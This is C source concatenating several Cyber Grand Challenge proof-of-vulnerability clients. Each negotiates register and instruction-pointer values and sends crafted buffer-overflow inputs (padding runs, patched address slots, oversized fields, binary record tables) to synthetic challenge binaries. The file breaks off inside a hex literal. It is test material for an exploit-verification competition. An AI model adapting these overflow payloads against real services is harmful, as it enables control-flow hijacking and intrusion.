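/*
 * CGC type 1 proof-of-vulnerability (PoV) client.
 *
 * Negotiates the register and instruction-pointer values it has to
 * demonstrate, patches them into a fixed request line, consumes the first
 * line sent by the challenge binary, then sends the request.
 */
int main(void)
{
    /* Scratch space for the line the challenge binary sends first. */
    char buf[512];

    /*
     * Request template. The BBBB/CCCC/DDDD markers are placeholders;
     * two 32-bit slots are overwritten below.
     * NOTE(review): offsets 132 and 140 are assumed to land on the BBBB and
     * DDDD markers - confirm against the length of the 'A' run.
     */
    char msg1[] = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBCCCCDDDD\n";

    unsigned int ipmask = 0x0EEEEEEE;

    /*
     * We use this mask because the cgc_read is delimited, so we OR the
     * requested value with this to ensure 0x0a doesn't exist: with the low
     * bit of every nibble set, no byte of the patched value can be 0x0a.
     */
    unsigned int orMask = 0xF1111111;

    unsigned int regmask = 0x0EEEEEEE;
    unsigned int regnum = 6; /* esi */
    type1_vals t1v;

    type1_negotiate(ipmask, regmask, regnum, &t1v);

    /*
     * NOTE(review): these stores go through an unsigned int pointer into a
     * char array at offsets that are not guaranteed to be 4-byte aligned;
     * this relies on the x86 target tolerating unaligned access.
     */
    *((unsigned int *)(msg1 + 132)) = t1v.regval | orMask;
    *((unsigned int *)(msg1 + 140)) = t1v.ipval | orMask;

    /* Consume the first line from the challenge binary before answering. */
    receive_until(STDIN, (char *)buf, 512, '\n');

    /*
     * Send exactly the request line, without its terminating NUL. The
     * original length was sizeof(buf) - 1 (511), which is larger than msg1
     * and read past the end of the array, sending unrelated stack bytes to
     * the peer.
     */
    transmit_all(STDOUT, msg1, sizeof(msg1) - 1);

    return (0);
}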
/*
 * CGC type 1 PoV client that drives a command-based service.
 *
 * After negotiation it reads a 2-byte value from the service, announces a
 * command count of 42, and sends a buffer of three-word commands (opcode
 * plus two operands) followed by CMD_EXP and CMD_QUT.
 */
int main(void)
{
    unsigned char payload[4096], output[4096];
    unsigned char *cursor = payload; /* next free byte in payload */
    unsigned int count;
    unsigned int k;
    int lhs, rhs;
    type1_vals t1;

    type1_negotiate(0xfefefefe, 0xfefefefe, 5, &t1);

    /* Read offset */
    length_read(STDIN, output, 2);
    short rslr = *(short *)output;

    /* Write n: 42 = 38 + 3 + 1, the number of three-word commands below. */
    count = 42;
    transmit_all(STDOUT, &count, sizeof(unsigned int));

    /* Fill */
    memset(payload, 0, sizeof(payload));

    /* 38 CMD_SUB commands with a random second operand. */
    for (k = 0; k != 38; k++) {
        random(&lhs, sizeof(int), NULL);

        *(unsigned int *)cursor = CMD_SUB;
        cursor += sizeof(unsigned int);
        *(int *)cursor = lhs - rslr;
        cursor += sizeof(int);
        *(int *)cursor = lhs;
        cursor += sizeof(int);
    }

    /* Three CMD_ADD commands whose operands are the two halves of regval. */
    lhs = t1.regval & 0xFFFF0000;
    rhs = t1.regval & 0x0000FFFF;
    for (k = 0; k != 3; k++) {
        *(unsigned int *)cursor = CMD_ADD;
        cursor += sizeof(unsigned int);
        *(int *)cursor = lhs - rslr;
        cursor += sizeof(int);
        *(int *)cursor = rhs;
        cursor += sizeof(int);
    }

    /* One CMD_ADD command whose operands are the two halves of ipval. */
    lhs = t1.ipval & 0xFFFF0000;
    rhs = t1.ipval & 0x0000FFFF;
    *(unsigned int *)cursor = CMD_ADD;
    cursor += sizeof(unsigned int);
    *(int *)cursor = lhs - rslr;
    cursor += sizeof(int);
    *(int *)cursor = rhs;
    cursor += sizeof(int);

    /* Trailing single-word commands. */
    *(unsigned int *)cursor = CMD_EXP;
    cursor += sizeof(unsigned int);
    *(unsigned int *)cursor = CMD_QUT;
    cursor += sizeof(unsigned int);

    transmit_all(STDOUT, payload, (size_t)(cursor - payload));

    /* Wait for one byte of reply before exiting. */
    length_read(STDIN, output, 1);

    return 0;
}
int main(void) { // negotiate type1_vals t1vals; type1_negotiate(0xEEEEEEEE, 0xEEEEEEEE, 5, &t1vals); // perform POV char input[11]; ReceiveFromCB(input, 9); char bytes[1111] = "POST sender:sender!recipient:+BCcCcCcCcCcCcCcCcCcCcCcCcCcCcCcCcCcCcJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJIIIIHHHH!body:dump 1128775680!subject:subject!\nQUIT\n"; *(int *)(bytes + 1059) = t1vals.regval | 0x11111111; *(int *)(bytes + 1063) = t1vals.ipval | 0x11111111; SendToCB(bytes, sizeof(bytes)); size_t bytes_received; char c; receive(FROM_CB, &c, 1, &bytes_received); return 0; }
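/*
 * CGC type 1 PoV client for a binary message protocol.
 *
 * Builds one well-formed programMessageType carrying the negotiated
 * register and instruction-pointer values, then sends an oversized filler
 * buffer followed by that message.
 */
int main(void)
{
    /* Byte count and fill value of the oversized buffer sent first. */
    enum { OVERFLOW_LEN = 1038, OVERFLOW_FILL = 0xa5 };

    /*
     * Zero-initialised so that fields this function does not set are sent
     * and checksummed as zeros instead of whatever was on the stack.
     */
    programMessageType theMessage = { 0 };
    unsigned int i;
    /*
     * The original accumulated into an uninitialised variable, so the
     * resulting check value was indeterminate.
     */
    unsigned int checkval = 0;
    unsigned char bad_buff[OVERFLOW_LEN];
    type1_vals t1vals;

    type1_negotiate(0xffffffff, 0xffffffff, 5, &t1vals);

    // Construct normal message with payload addresses
    theMessage.flag = 0x5aa5;
    theMessage.length = CMD_LEN;
    theMessage.command[0] = 0x11;
    /*
     * NOTE(review): 32-bit stores at command[1] and command[5] are
     * unaligned; this relies on the x86 target tolerating that.
     */
    *(unsigned int *)&(theMessage.command[1]) = t1vals.regval;
    *(unsigned int *)&(theMessage.command[5]) = t1vals.ipval;

    /*
     * Position-weighted byte sum over everything except the last four bytes
     * of the struct (presumably the checkvalue field itself - confirm
     * against the programMessageType layout).
     */
    for (i = 0; i < sizeof(programMessageType) - 4; ++i) {
        checkval += *((unsigned char *)&theMessage + i) * (i + 1);
    }
    theMessage.checkvalue = checkval;

    // Construct overflow
    for (i = 0; i < OVERFLOW_LEN; i++) {
        bad_buff[i] = OVERFLOW_FILL;
    }

    // Send overflow
    SendToCB((void *)bad_buff, OVERFLOW_LEN);

    // Send message with payload
    SendToCB((void *)&theMessage, sizeof(programMessageType));

    return 0;
}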
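/*
 * CGC type 1 PoV client (generated write/read script with one hand-edited
 * step).
 *
 * Sends five canned binary messages and reads a 4-byte reply after each.
 * The second message is a table of 16-byte records; before it is sent, the
 * first and fourth word of every record are overwritten with values derived
 * from the negotiated register and instruction-pointer values.
 */
int main(void)
{
    type1_vals t1vals = { 0 };
    uint32_t mask_eip, mask_reg;

    mask_eip = 0x0FFFFF00;
    mask_reg = 0x0FFFFF00;
    type1_negotiate(mask_eip, mask_reg, 2, &t1vals);

    t1vals.ipval |= 0xF0000000;  // make sure out of range of valid fn ptrs
    t1vals.regval |= 0xF0000000; // make sure out of range of valid fn ptrs

    {
        //*** writing data
        static unsigned char write_00000_00000[] =
            "\xd0\xd1\xd2\xd3\x04\x00\x00\x00\x03\x00\x00\x00\x06\x00\x00\x00"
            "\x00\x00\x00\x00\x88\x13\x00\x00\x01\x00\x00\x00\x7c\x24\x00\x00"
            "\x02\x00\x00\x00\x03\x26\x00\x00\x03\x00\x00\x00\x5c\x1d\x00\x00"
            "\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x0f\x00\x00\x00"
            "\x04\x00\x00\x00\x01\x00\x00\x00\x03\x00\x00\x00\x02\x00\x00\x00"
            "\x0f\x00\x00\x00\x02\x00\x00\x00\x02\x00\x00\x00\x03\x00\x00\x00"
            "\x02\x00\x00\x00\x0f\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00"
            "\x01\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x0f\x00\x00\x00"
            "\x01\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00"
            "\x0f\x00\x00\x00\x02\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00"
            "\x05\x00\x00\x00\x0f\x00\x00\x00\x03\x00\x00\x00\x01\x00\x00\x00"
            "\x03\x00\x00\x00\x04\x00\x00\x00\x0f\x00\x00\x00\x04\x00\x00\x00"
            "\x01\x00\x00\x00\x03\x00\x00\x00\x05\x00\x00\x00\x0f\x00\x00\x00"
            "\x05\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00"
            "\x0f\x00\x00\x00";
        static unsigned int write_00000_00000_len = 228;
        unsigned char *write_00000 = NULL;
        unsigned int write_00000_len = 0;

        write_00000 = append_buf(write_00000, &write_00000_len,
                                 write_00000_00000, write_00000_00000_len);
        if (write_00000_len > 0) {
            transmit_all(1, write_00000, write_00000_len);
        }
        free(write_00000);
    }

    {
        //**** length cgc_read
        /*
         * The 4-byte reply is read and discarded. A stack buffer replaces
         * the original unchecked malloc(4), which would have handed NULL to
         * length_read on allocation failure.
         */
        unsigned char read_00000[4];

        (void)length_read(0, read_00000, sizeof(read_00000));
    }

    {
        //*** writing data
        /* 8-byte header (command bytes, record count 0xc8) + 200 records. */
        static unsigned char write_00001_00000[] =
            "\x40\x41\x42\x43\xc8\x00\x00\x00\x41\x41\x41\x41\x01\x00\x00\x00"
            "\x1c\x00\x00\x00\x1f\x1f\x1f\x1f\x42\x41\x41\x41\x00\x00\x00\x00"
            "\x26\x00\x00\x00\x20\x1f\x1f\x1f\x43\x41\x41\x41\x00\x00\x00\x00"
            "\x1f\x00\x00\x00\x21\x1f\x1f\x1f\x44\x41\x41\x41\x00\x00\x00\x00"
            "\x2f\x00\x00\x00\x22\x1f\x1f\x1f\x45\x41\x41\x41\x01\x00\x00\x00"
            "\x0f\x00\x00\x00\x23\x1f\x1f\x1f\x46\x41\x41\x41\x00\x00\x00\x00"
            "\x25\x00\x00\x00\x24\x1f\x1f\x1f\x47\x41\x41\x41\x00\x00\x00\x00"
            "\x20\x00\x00\x00\x25\x1f\x1f\x1f\x48\x41\x41\x41\x00\x00\x00\x00"
            "\x11\x00\x00\x00\x26\x1f\x1f\x1f\x49\x41\x41\x41\x00\x00\x00\x00"
            "\x0d\x00\x00\x00\x27\x1f\x1f\x1f\x4a\x41\x41\x41\x01\x00\x00\x00"
            "\x12\x00\x00\x00\x28\x1f\x1f\x1f\x4b\x41\x41\x41\x00\x00\x00\x00"
            "\x0e\x00\x00\x00\x29\x1f\x1f\x1f\x4c\x41\x41\x41\x01\x00\x00\x00"
            "\x15\x00\x00\x00\x2a\x1f\x1f\x1f\x4d\x41\x41\x41\x01\x00\x00\x00"
            "\x20\x00\x00\x00\x2b\x1f\x1f\x1f\x4e\x41\x41\x41\x00\x00\x00\x00"
            "\x09\x00\x00\x00\x2c\x1f\x1f\x1f\x4f\x41\x41\x41\x00\x00\x00\x00"
            "\x07\x00\x00\x00\x2d\x1f\x1f\x1f\x50\x41\x41\x41\x00\x00\x00\x00"
            "\x2e\x00\x00\x00\x2e\x1f\x1f\x1f\x51\x41\x41\x41\x00\x00\x00\x00"
            "\x17\x00\x00\x00\x2f\x1f\x1f\x1f\x52\x41\x41\x41\x00\x00\x00\x00"
            "\x05\x00\x00\x00\x30\x1f\x1f\x1f\x53\x41\x41\x41\x00\x00\x00\x00"
            "\x22\x00\x00\x00\x31\x1f\x1f\x1f\x54\x41\x41\x41\x01\x00\x00\x00"
            "\x15\x00\x00\x00\x32\x1f\x1f\x1f\x55\x41\x41\x41\x01\x00\x00\x00"
            "\x25\x00\x00\x00\x33\x1f\x1f\x1f\x56\x41\x41\x41\x01\x00\x00\x00"
            "\x0d\x00\x00\x00\x34\x1f\x1f\x1f\x57\x41\x41\x41\x01\x00\x00\x00"
            "\x10\x00\x00\x00\x35\x1f\x1f\x1f\x58\x41\x41\x41\x01\x00\x00\x00"
            "\x2b\x00\x00\x00\x36\x1f\x1f\x1f\x59\x41\x41\x41\x01\x00\x00\x00"
            "\x32\x00\x00\x00\x37\x1f\x1f\x1f\x5a\x41\x41\x41\x01\x00\x00\x00"
            "\x14\x00\x00\x00\x38\x1f\x1f\x1f\x5b\x41\x41\x41\x01\x00\x00\x00"
            "\x29\x00\x00\x00\x39\x1f\x1f\x1f\x5c\x41\x41\x41\x00\x00\x00\x00"
            "\x19\x00\x00\x00\x3a\x1f\x1f\x1f\x5d\x41\x41\x41\x01\x00\x00\x00"
            "\x0c\x00\x00\x00\x3b\x1f\x1f\x1f\x5e\x41\x41\x41\x01\x00\x00\x00"
            "\x11\x00\x00\x00\x3c\x1f\x1f\x1f\x5f\x41\x41\x41\x00\x00\x00\x00"
            "\x25\x00\x00\x00\x3d\x1f\x1f\x1f\x60\x41\x41\x41\x00\x00\x00\x00"
            "\x12\x00\x00\x00\x3e\x1f\x1f\x1f\x61\x41\x41\x41\x01\x00\x00\x00"
            "\x11\x00\x00\x00\x3f\x1f\x1f\x1f\x62\x41\x41\x41\x00\x00\x00\x00"
            "\x14\x00\x00\x00\x40\x1f\x1f\x1f\x63\x41\x41\x41\x01\x00\x00\x00"
            "\x2b\x00\x00\x00\x41\x1f\x1f\x1f\x64\x41\x41\x41\x01\x00\x00\x00"
            "\x2b\x00\x00\x00\x42\x1f\x1f\x1f\x65\x41\x41\x41\x01\x00\x00\x00"
            "\x20\x00\x00\x00\x43\x1f\x1f\x1f\x66\x41\x41\x41\x00\x00\x00\x00"
            "\x06\x00\x00\x00\x44\x1f\x1f\x1f\x67\x41\x41\x41\x01\x00\x00\x00"
            "\x2d\x00\x00\x00\x45\x1f\x1f\x1f\x68\x41\x41\x41\x01\x00\x00\x00"
            "\x1a\x00\x00\x00\x46\x1f\x1f\x1f\x69\x41\x41\x41\x01\x00\x00\x00"
            "\x0e\x00\x00\x00\x47\x1f\x1f\x1f\x6a\x41\x41\x41\x01\x00\x00\x00"
            "\x1c\x00\x00\x00\x48\x1f\x1f\x1f\x6b\x41\x41\x41\x01\x00\x00\x00"
            "\x28\x00\x00\x00\x49\x1f\x1f\x1f\x6c\x41\x41\x41\x01\x00\x00\x00"
            "\x07\x00\x00\x00\x4a\x1f\x1f\x1f\x6d\x41\x41\x41\x00\x00\x00\x00"
            "\x08\x00\x00\x00\x4b\x1f\x1f\x1f\x6e\x41\x41\x41\x01\x00\x00\x00"
            "\x2d\x00\x00\x00\x4c\x1f\x1f\x1f\x6f\x41\x41\x41\x00\x00\x00\x00"
            "\x21\x00\x00\x00\x4d\x1f\x1f\x1f\x70\x41\x41\x41\x00\x00\x00\x00"
            "\x1c\x00\x00\x00\x4e\x1f\x1f\x1f\x71\x41\x41\x41\x01\x00\x00\x00"
            "\x08\x00\x00\x00\x4f\x1f\x1f\x1f\x72\x41\x41\x41\x00\x00\x00\x00"
            "\x13\x00\x00\x00\x50\x1f\x1f\x1f\x73\x41\x41\x41\x00\x00\x00\x00"
            "\x0f\x00\x00\x00\x51\x1f\x1f\x1f\x74\x41\x41\x41\x00\x00\x00\x00"
            "\x0c\x00\x00\x00\x52\x1f\x1f\x1f\x75\x41\x41\x41\x01\x00\x00\x00"
            "\x25\x00\x00\x00\x53\x1f\x1f\x1f\x76\x41\x41\x41\x00\x00\x00\x00"
            "\x1e\x00\x00\x00\x54\x1f\x1f\x1f\x77\x41\x41\x41\x01\x00\x00\x00"
            "\x2c\x00\x00\x00\x55\x1f\x1f\x1f\x78\x41\x41\x41\x00\x00\x00\x00"
            "\x20\x00\x00\x00\x56\x1f\x1f\x1f\x79\x41\x41\x41\x00\x00\x00\x00"
            "\x21\x00\x00\x00\x57\x1f\x1f\x1f\x7a\x41\x41\x41\x01\x00\x00\x00"
            "\x23\x00\x00\x00\x58\x1f\x1f\x1f\x7b\x41\x41\x41\x00\x00\x00\x00"
            "\x20\x00\x00\x00\x59\x1f\x1f\x1f\x7c\x41\x41\x41\x01\x00\x00\x00"
            "\x21\x00\x00\x00\x5a\x1f\x1f\x1f\x7d\x41\x41\x41\x01\x00\x00\x00"
            "\x32\x00\x00\x00\x5b\x1f\x1f\x1f\x7e\x41\x41\x41\x01\x00\x00\x00"
            "\x25\x00\x00\x00\x5c\x1f\x1f\x1f\x7f\x41\x41\x41\x01\x00\x00\x00"
            "\x13\x00\x00\x00\x5d\x1f\x1f\x1f\x80\x41\x41\x41\x01\x00\x00\x00"
            "\x17\x00\x00\x00\x5e\x1f\x1f\x1f\x81\x41\x41\x41\x01\x00\x00\x00"
            "\x31\x00\x00\x00\x5f\x1f\x1f\x1f\x82\x41\x41\x41\x01\x00\x00\x00"
            "\x23\x00\x00\x00\x60\x1f\x1f\x1f\x83\x41\x41\x41\x00\x00\x00\x00"
            "\x1b\x00\x00\x00\x61\x1f\x1f\x1f\x84\x41\x41\x41\x00\x00\x00\x00"
            "\x11\x00\x00\x00\x62\x1f\x1f\x1f\x85\x41\x41\x41\x01\x00\x00\x00"
            "\x25\x00\x00\x00\x63\x1f\x1f\x1f\x86\x41\x41\x41\x01\x00\x00\x00"
            "\x10\x00\x00\x00\x64\x1f\x1f\x1f\x87\x41\x41\x41\x01\x00\x00\x00"
            "\x0f\x00\x00\x00\x65\x1f\x1f\x1f\x88\x41\x41\x41\x00\x00\x00\x00"
            "\x09\x00\x00\x00\x66\x1f\x1f\x1f\x89\x41\x41\x41\x01\x00\x00\x00"
            "\x0f\x00\x00\x00\x67\x1f\x1f\x1f\x8a\x41\x41\x41\x00\x00\x00\x00"
            "\x23\x00\x00\x00\x68\x1f\x1f\x1f\x8b\x41\x41\x41\x01\x00\x00\x00"
            "\x19\x00\x00\x00\x69\x1f\x1f\x1f\x8c\x41\x41\x41\x01\x00\x00\x00"
            "\x0c\x00\x00\x00\x6a\x1f\x1f\x1f\x8d\x41\x41\x41\x01\x00\x00\x00"
            "\x1f\x00\x00\x00\x6b\x1f\x1f\x1f\x8e\x41\x41\x41\x00\x00\x00\x00"
            "\x1c\x00\x00\x00\x6c\x1f\x1f\x1f\x8f\x41\x41\x41\x01\x00\x00\x00"
            "\x2d\x00\x00\x00\x6d\x1f\x1f\x1f\x90\x41\x41\x41\x01\x00\x00\x00"
            "\x0a\x00\x00\x00\x6e\x1f\x1f\x1f\x91\x41\x41\x41\x00\x00\x00\x00"
            "\x05\x00\x00\x00\x6f\x1f\x1f\x1f\x92\x41\x41\x41\x01\x00\x00\x00"
            "\x08\x00\x00\x00\x70\x1f\x1f\x1f\x93\x41\x41\x41\x01\x00\x00\x00"
            "\x31\x00\x00\x00\x71\x1f\x1f\x1f\x94\x41\x41\x41\x00\x00\x00\x00"
            "\x12\x00\x00\x00\x72\x1f\x1f\x1f\x95\x41\x41\x41\x00\x00\x00\x00"
            "\x13\x00\x00\x00\x73\x1f\x1f\x1f\x96\x41\x41\x41\x00\x00\x00\x00"
            "\x16\x00\x00\x00\x74\x1f\x1f\x1f\x97\x41\x41\x41\x00\x00\x00\x00"
            "\x22\x00\x00\x00\x75\x1f\x1f\x1f\x98\x41\x41\x41\x00\x00\x00\x00"
            "\x20\x00\x00\x00\x76\x1f\x1f\x1f\x99\x41\x41\x41\x01\x00\x00\x00"
            "\x21\x00\x00\x00\x77\x1f\x1f\x1f\x9a\x41\x41\x41\x01\x00\x00\x00"
            "\x20\x00\x00\x00\x78\x1f\x1f\x1f\x9b\x41\x41\x41\x00\x00\x00\x00"
            "\x20\x00\x00\x00\x79\x1f\x1f\x1f\x9c\x41\x41\x41\x01\x00\x00\x00"
            "\x1b\x00\x00\x00\x7a\x1f\x1f\x1f\x9d\x41\x41\x41\x00\x00\x00\x00"
            "\x1b\x00\x00\x00\x7b\x1f\x1f\x1f\x9e\x41\x41\x41\x00\x00\x00\x00"
            "\x2f\x00\x00\x00\x7c\x1f\x1f\x1f\x9f\x41\x41\x41\x00\x00\x00\x00"
            "\x08\x00\x00\x00\x7d\x1f\x1f\x1f\xa0\x41\x41\x41\x01\x00\x00\x00"
            "\x24\x00\x00\x00\x7e\x1f\x1f\x1f\xa1\x41\x41\x41\x00\x00\x00\x00"
            "\x13\x00\x00\x00\x7f\x1f\x1f\x1f\xa2\x41\x41\x41\x01\x00\x00\x00"
            "\x19\x00\x00\x00\x80\x1f\x1f\x1f\xa3\x41\x41\x41\x01\x00\x00\x00"
            "\x1d\x00\x00\x00\x81\x1f\x1f\x1f\xa4\x41\x41\x41\x01\x00\x00\x00"
            "\x13\x00\x00\x00\x82\x1f\x1f\x1f\xa5\x41\x41\x41\x00\x00\x00\x00"
            "\x0d\x00\x00\x00\x83\x1f\x1f\x1f\xa6\x41\x41\x41\x01\x00\x00\x00"
            "\x21\x00\x00\x00\x84\x1f\x1f\x1f\xa7\x41\x41\x41\x01\x00\x00\x00"
            "\x2f\x00\x00\x00\x85\x1f\x1f\x1f\xa8\x41\x41\x41\x00\x00\x00\x00"
            "\x06\x00\x00\x00\x86\x1f\x1f\x1f\xa9\x41\x41\x41\x01\x00\x00\x00"
            "\x2e\x00\x00\x00\x87\x1f\x1f\x1f\xaa\x41\x41\x41\x01\x00\x00\x00"
            "\x0b\x00\x00\x00\x88\x1f\x1f\x1f\xab\x41\x41\x41\x01\x00\x00\x00"
            "\x32\x00\x00\x00\x89\x1f\x1f\x1f\xac\x41\x41\x41\x01\x00\x00\x00"
            "\x09\x00\x00\x00\x8a\x1f\x1f\x1f\xad\x41\x41\x41\x01\x00\x00\x00"
            "\x2a\x00\x00\x00\x8b\x1f\x1f\x1f\xae\x41\x41\x41\x01\x00\x00\x00"
            "\x0d\x00\x00\x00\x8c\x1f\x1f\x1f\xaf\x41\x41\x41\x00\x00\x00\x00"
            "\x16\x00\x00\x00\x8d\x1f\x1f\x1f\xb0\x41\x41\x41\x00\x00\x00\x00"
            "\x08\x00\x00\x00\x8e\x1f\x1f\x1f\xb1\x41\x41\x41\x01\x00\x00\x00"
            "\x08\x00\x00\x00\x8f\x1f\x1f\x1f\xb2\x41\x41\x41\x01\x00\x00\x00"
            "\x1d\x00\x00\x00\x90\x1f\x1f\x1f\xb3\x41\x41\x41\x01\x00\x00\x00"
            "\x12\x00\x00\x00\x91\x1f\x1f\x1f\xb4\x41\x41\x41\x00\x00\x00\x00"
            "\x2f\x00\x00\x00\x92\x1f\x1f\x1f\xb5\x41\x41\x41\x00\x00\x00\x00"
            "\x0b\x00\x00\x00\x93\x1f\x1f\x1f\xb6\x41\x41\x41\x00\x00\x00\x00"
            "\x29\x00\x00\x00\x94\x1f\x1f\x1f\xb7\x41\x41\x41\x01\x00\x00\x00"
            "\x0a\x00\x00\x00\x95\x1f\x1f\x1f\xb8\x41\x41\x41\x00\x00\x00\x00"
            "\x13\x00\x00\x00\x96\x1f\x1f\x1f\xb9\x41\x41\x41\x00\x00\x00\x00"
            "\x21\x00\x00\x00\x97\x1f\x1f\x1f\xba\x41\x41\x41\x01\x00\x00\x00"
            "\x1f\x00\x00\x00\x98\x1f\x1f\x1f\xbb\x41\x41\x41\x00\x00\x00\x00"
            "\x23\x00\x00\x00\x99\x1f\x1f\x1f\xbc\x41\x41\x41\x00\x00\x00\x00"
            "\x1c\x00\x00\x00\x9a\x1f\x1f\x1f\xbd\x41\x41\x41\x00\x00\x00\x00"
            "\x09\x00\x00\x00\x9b\x1f\x1f\x1f\xbe\x41\x41\x41\x00\x00\x00\x00"
            "\x1a\x00\x00\x00\x9c\x1f\x1f\x1f\xbf\x41\x41\x41\x00\x00\x00\x00"
            "\x10\x00\x00\x00\x9d\x1f\x1f\x1f\xc0\x41\x41\x41\x00\x00\x00\x00"
            "\x20\x00\x00\x00\x9e\x1f\x1f\x1f\xc1\x41\x41\x41\x00\x00\x00\x00"
            "\x1d\x00\x00\x00\x9f\x1f\x1f\x1f\xc2\x41\x41\x41\x00\x00\x00\x00"
            "\x2c\x00\x00\x00\xa0\x1f\x1f\x1f\xc3\x41\x41\x41\x01\x00\x00\x00"
            "\x13\x00\x00\x00\xa1\x1f\x1f\x1f\xc4\x41\x41\x41\x00\x00\x00\x00"
            "\x2e\x00\x00\x00\xa2\x1f\x1f\x1f\xc5\x41\x41\x41\x01\x00\x00\x00"
            "\x1c\x00\x00\x00\xa3\x1f\x1f\x1f\xc6\x41\x41\x41\x01\x00\x00\x00"
            "\x0f\x00\x00\x00\xa4\x1f\x1f\x1f\xc7\x41\x41\x41\x01\x00\x00\x00"
            "\x16\x00\x00\x00\xa5\x1f\x1f\x1f\xc8\x41\x41\x41\x00\x00\x00\x00"
            "\x0c\x00\x00\x00\xa6\x1f\x1f\x1f\xc9\x41\x41\x41\x01\x00\x00\x00"
            "\x0f\x00\x00\x00\xa7\x1f\x1f\x1f\xca\x41\x41\x41\x01\x00\x00\x00"
            "\x13\x00\x00\x00\xa8\x1f\x1f\x1f\xcb\x41\x41\x41\x01\x00\x00\x00"
            "\x32\x00\x00\x00\xa9\x1f\x1f\x1f\xcc\x41\x41\x41\x01\x00\x00\x00"
            "\x06\x00\x00\x00\xaa\x1f\x1f\x1f\xcd\x41\x41\x41\x01\x00\x00\x00"
            "\x18\x00\x00\x00\xab\x1f\x1f\x1f\xce\x41\x41\x41\x00\x00\x00\x00"
            "\x17\x00\x00\x00\xac\x1f\x1f\x1f\xcf\x41\x41\x41\x01\x00\x00\x00"
            "\x29\x00\x00\x00\xad\x1f\x1f\x1f\xd0\x41\x41\x41\x00\x00\x00\x00"
            "\x0c\x00\x00\x00\xae\x1f\x1f\x1f\xd1\x41\x41\x41\x01\x00\x00\x00"
            "\x2b\x00\x00\x00\xaf\x1f\x1f\x1f\xd2\x41\x41\x41\x01\x00\x00\x00"
            "\x09\x00\x00\x00\xb0\x1f\x1f\x1f\xd3\x41\x41\x41\x01\x00\x00\x00"
            "\x0b\x00\x00\x00\xb1\x1f\x1f\x1f\xd4\x41\x41\x41\x00\x00\x00\x00"
            "\x0f\x00\x00\x00\xb2\x1f\x1f\x1f\xd5\x41\x41\x41\x01\x00\x00\x00"
            "\x17\x00\x00\x00\xb3\x1f\x1f\x1f\xd6\x41\x41\x41\x01\x00\x00\x00"
            "\x16\x00\x00\x00\xb4\x1f\x1f\x1f\xd7\x41\x41\x41\x00\x00\x00\x00"
            "\x0a\x00\x00\x00\xb5\x1f\x1f\x1f\xd8\x41\x41\x41\x01\x00\x00\x00"
            "\x23\x00\x00\x00\xb6\x1f\x1f\x1f\xd9\x41\x41\x41\x01\x00\x00\x00"
            "\x0a\x00\x00\x00\xb7\x1f\x1f\x1f\xda\x41\x41\x41\x01\x00\x00\x00"
            "\x2c\x00\x00\x00\xb8\x1f\x1f\x1f\xdb\x41\x41\x41\x00\x00\x00\x00"
            "\x24\x00\x00\x00\xb9\x1f\x1f\x1f\xdc\x41\x41\x41\x00\x00\x00\x00"
            "\x0f\x00\x00\x00\xba\x1f\x1f\x1f\xdd\x41\x41\x41\x00\x00\x00\x00"
            "\x2a\x00\x00\x00\xbb\x1f\x1f\x1f\xde\x41\x41\x41\x01\x00\x00\x00"
            "\x1f\x00\x00\x00\xbc\x1f\x1f\x1f\xdf\x41\x41\x41\x00\x00\x00\x00"
            "\x22\x00\x00\x00\xbd\x1f\x1f\x1f\xe0\x41\x41\x41\x00\x00\x00\x00"
            "\x27\x00\x00\x00\xbe\x1f\x1f\x1f\xe1\x41\x41\x41\x01\x00\x00\x00"
            "\x1e\x00\x00\x00\xbf\x1f\x1f\x1f\xe2\x41\x41\x41\x00\x00\x00\x00"
            "\x12\x00\x00\x00\xc0\x1f\x1f\x1f\xe3\x41\x41\x41\x00\x00\x00\x00"
            "\x06\x00\x00\x00\xc1\x1f\x1f\x1f\xe4\x41\x41\x41\x00\x00\x00\x00"
            "\x06\x00\x00\x00\xc2\x1f\x1f\x1f\xe5\x41\x41\x41\x00\x00\x00\x00"
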